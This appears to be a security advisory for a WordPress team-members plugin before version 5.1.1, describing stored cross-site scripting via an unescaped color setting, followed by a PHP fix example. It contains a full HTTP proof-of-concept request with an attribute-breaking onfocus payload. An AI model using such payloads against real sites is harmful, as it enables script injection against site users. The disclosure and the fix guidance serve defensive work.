The plugin does not escape some of its Team settings, which could allow high-privilege users such as admins to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
The team_color field (i.e. the “Main color” setting of a team) is affected:

```
POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 799
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=13207515fa&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=tmm&original_post_status=auto-draft&auto_draft=&post_ID=6069&meta-box-order-nonce=66d1e9f3bf&closedpostboxesnonce=148d1a7663&post_title=Test&samplepermalinknonce=25926b035a&team_columns=3&team_piclink_beh=new&team_force_font=yes&team_color=%2381d742%22%20autofocus%20onfocus%3dalert(%2fXSS2%2f)%2f%2f&save=Save+Draft&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=05&jj=04&aa=2022&hh=08&mn=02&ss=58&hidden_mm=05&cur_mm=05&hidden_jj=04&cur_jj=04&hidden_aa=2022&cur_aa=2022&hidden_hh=08&cur_hh=08&hidden_mn=02&cur_mn=02&original_publish=Publish&dmb_tmm_meta_box_nonce=92f792d2d0&dmb_editor=&tmm_data_dumps%5B%5D=&post_name=
```
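As an added illustration (not the plugin's code or its actual patch): a stand-alone PHP example of validating a color setting such as team_color on save and escaping it on output, assuming the value is echoed into an HTML attribute, as the shape of the submitted value suggests. The function names and the default color are hypothetical; in WordPress, sanitize_hex_color() and esc_attr() are the counterparts of the two checks.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical.

// Constructed input: the URL-decoded team_color value from the request above.
$submitted = '#81d742" autofocus onfocus=alert(/XSS2/)//';

/**
 * Validate on save: accept only #rgb or #rrggbb, otherwise fall back.
 * In WordPress, sanitize_hex_color() performs this kind of check.
 * The default color is a constructed value.
 */
function tmm_example_sanitize_color(string $raw, string $default = '#333333'): string
{
    $raw = trim($raw);
    return preg_match('/\A#(?:[0-9a-fA-F]{3}){1,2}\z/', $raw) === 1 ? $raw : $default;
}

/**
 * Escape on output: encode the value for an attribute context even if it
 * was validated on save (values stored before a fix may still be tainted).
 * In WordPress, esc_attr() is the equivalent call.
 */
function tmm_example_render_input(string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="team_color" value="' . $safe . '">';
}

// Unescaped rendering, shown only to make the defect visible: the quote in
// the value closes the attribute and the rest is parsed as new attributes.
$unescaped = '<input type="text" name="team_color" value="' . $submitted . '">';

echo "unescaped : $unescaped\n";
echo "escaped   : " . tmm_example_render_input($submitted) . "\n";
echo "validated : " . tmm_example_render_input(tmm_example_sanitize_color($submitted)) . "\n";
echo "valid hex : " . tmm_example_render_input(tmm_example_sanitize_color('#81d742')) . "\n";
```

Validation alone rejects the submitted value, and escaping alone keeps it inside the attribute; applying both covers values that were stored before validation existed.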
CPE

Name | Operator | Version |
---|---|---|
team-members | lt | 5.1.1 |